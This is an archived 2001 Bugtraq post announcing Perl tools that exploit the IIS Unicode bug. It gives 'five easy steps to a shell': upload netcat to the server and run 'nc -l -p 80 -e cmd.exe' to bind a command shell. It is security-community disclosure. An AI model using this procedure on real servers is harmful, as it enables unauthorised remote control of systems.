Bugtraq mailing list archives
shell on IIS server with Unicode using *only* HTTP
From: Roelof Temmingh <roelof () SENSEPOST COM>
Date: Thu, 25 Jan 2001 02:30:10 +0200
(assumes an IIS server vulnerable for the Unicode bug) Tarball contains two PERL scripts: 1. Unicode upload creator (unicodeloader.pl) Works like this - two files (upload.asp and upload.inc - have them in the same dir as the PERL script) are build in the webroot (or anywhere else) using echo and some conversion strings. These files allows you to upload any file by simply surfing with a browser to the server. Typical use: (5 easy steps to a shell) 1. Find the webroot (duh) 2. perl unicodeloader target:80 'webroot' 3. surf to target/upload.asp and upload nc.exe 4. perl unicodexecute3.pl target:80 'webroot/nc -l -p 80 -e cmd.exe' 5. telnet target 80 Above procedure will drop you into a shell on the box without crashing the server (*winks at Eeye*). This procedure is nice for servers that are very tightly firewalled; servers that are not allowed to FTP, RCP or TFTP to the Internet. 2. Unicodexecute version3 (unicodexecute3.pl) same as before plus -includes searches for alternative executable dirs -more robust, stable than before -checks for access denied etc. added Regards, Roelof. ------------------------------------------------------ Roelof W Temmingh SensePost IT security roelof () sensepost com +27 83 448 6996 http://www.sensepost.com
Attachment:
unitools.tgz
Description:
Current thread:
- shell on IIS server with Unicode using *only* HTTP Roelof Temmingh (Jan 24)
- Re: shell on IIS server with Unicode using *only* HTTP Marc Maiffret (Jan 26)